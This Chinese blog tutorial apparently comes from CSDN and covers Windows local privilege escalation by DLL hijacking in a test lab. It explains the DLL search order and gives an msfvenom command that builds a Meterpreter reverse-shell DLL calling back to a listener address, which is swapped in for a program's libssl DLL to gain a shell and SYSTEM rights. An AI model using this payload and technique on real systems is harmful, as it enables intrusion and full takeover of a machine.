【Windows提权】本地提权之dll劫持

最新推荐文章于 2024-05-08 13:29:53 发布
最新推荐文章于 2024-05-08 13:29:53 发布
阅读量2.2k 收藏 9
点赞数 5
分类专栏: 提权 文章标签: dll劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114366001
版权

目录

0x001 原理

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

Windows查找DLL目录及其顺序如下:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。

详细文章介绍:https://www.anquanke.com/post/id/225911

0x002 演示

程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成木马程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

攻击过程:收集进程加载的dll-制作dll木马并上传-替换dll-启动应用后成功

我们在Windows2008装了一个第三方软件用于测试

1、收集进程加载的dll

使用火绒剑分析该进程执行时加载了哪些dll
在这里插入图片描述
系统文件一般我们是更改不了的,所以一般选择未知文件和数字签名文件。
在这里插入图片描述

2、msf制作dll木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.134  lport=6677 -f dll >./libssl-1_1.dll

在这里插入图片描述

3、替换dll

在这里插入图片描述

4、启动软件

在这里插入图片描述
启动后执行的是我们替换的木马dll,剩下就是使用msf监听端口接收反弹回来的shell就可以了,思路有很多,取决于我们制作的dll用于干什么。
在这里插入图片描述
这里劫持dll配合令牌窃取拿到了system权限

多学点技术
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Windows本地提权 · 下篇
qq_61553520的博客
05-31 1086
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
提权 - Windows 烂土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1212
提权 - Windows 烂土豆/ dll劫持 /服务权限
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
最新发布
2401_84253894的博客
05-08 962
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
基于DLL劫持的WebShell提权
沧海桑田
05-05 1286
从本文您可以学到:   什么是DLL劫持   DLL劫持在破解逆向程序时是常用的,我们同样可以用于Webshell提权。   ●DLL劫持产生的原因●   先来看一下,DLL劫持的原因。   1、WindowsDLL称为动态链接库,动态链接库技术的本质实际上是将可执行文件与库文件分离,DLL库文件通过导出表提供API接口,PE加载器通过exe文件的导入表加载相应的D
提权-win烂土豆&dll劫持&引号路径&服务权限
qi_SJQ_的博客
02-02 1670
以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限。 win 烂土豆提权(MS16-075): 烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户,webshell环境或本地普通用户环境都可以适用。 过程:msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号:CVE-2016-3225 )。 我们是用之前的令牌窃取提权无法成功,因为web.
提权工具 pr.exe.zip
12-10
1. **本地提权**:利用系统或服务中的安全漏洞,例如缓冲区溢出、权限配置错误等,来提升当前进程的权限。 2. **权限滥用**:通过发现并利用系统中预设但未正确管理的权限,比如滥用服务帐户,或者通过弱权限的服务...
lpk.rar_delphi 提权_提权
09-21
标题中的"lpk.rar_delphi 提权_提权"表明这是一个与Delphi编程语言相关的提权(Privilege Escalation)技术,特别是通过一个名为"lpk.dll"的动态链接库来实现。在Windows系统中,提权是指非管理员用户获取更高的系统...
python禁用键鼠与提权代码实例
09-18
此外,有些操作可能需要更高的权限才能执行,比如修改系统设置或访问受保护的文件,这时就需要进行程序的提权。本篇文章将详细讲解如何使用Python实现这两个功能。 首先,禁用键盘和鼠标输入是通过调用Windows API...
PoCs-win提权.zip
04-08
Windows提权主要分为本地提权和远程提权。本地提权是指攻击者已经获得了系统的一部分访问权限,但希望通过利用漏洞获取更高的权限。远程提权则是在未授权的情况下,通过网络连接获取目标系统的管理员权限。在本文中...
MYSQL提权UDF.dll
06-11
MySQL提权UDF.dll是关于数据库安全领域的一个关键知识点,主要涉及到MySQL服务器的权限提升漏洞利用。UDF(User Defined Function)是MySQL提供的一种机制,允许用户自定义函数以扩展其功能。然而,不当的UDF管理或...
usp.dll提权工具(强大成功率高)
10-20
将此DLL文件放入服务器存在EXE的目录中,重启后(可以攻击导致重启,其他方法也行,就是让系统再次运行此目录的任何一个EXE就行)
asp.dll提权(珍藏)
10-18
目的:提升asp木马的权限,留做后门
权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
siu~
03-27 867
1、计算机用户到System-入口点和应用点 2、计算机用户到System-UAC绕过&DLL劫持&未引号服务 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Windows提权笔记-动态库劫持dll劫持、包含多种绕过UAC方法)
墨痕诉清风的博客
03-12 625
dll 劫持是也是绕过 UAC 常用的方法,在 UACME 项目中很多绕过方法都是使用 dll 劫持dll 劫持也是一个比较大的主题。一般操作如下,假设受信任的程序 c:\windows\system32\test\test.exe 会加载 c:\windows\system32\test.dll (不在 KnowsDLLS里面),
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1028
DLL注入提权、不带引号的服务路径提权、注册表提权
mysql上传dll 提权_SqlMap mysql udf.dll 提权
weixin_32272937的博客
01-19 154
上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_my...
高版本mysql自定义dll提权_MySQL提权之udf提权(获得webshell的情况)
weixin_34194520的博客
01-19 471
什么是udf提权?MySQL提供了一个让使用者自行添加新的函数的功能,这种用户自行扩展函数的功能就叫udf。它的提权原理也非常简单!即是利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库!这样一来我们就可以利用 system权限进行提权操作了!当我们拿到webshell后,由于中间件,例如,apache使用了较低的权限,可能仅仅是个网络服务的权限,然后我们就需要进行提权,而...
内网渗透常用提权方式总结
j1044957016的博客
06-01 7336
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值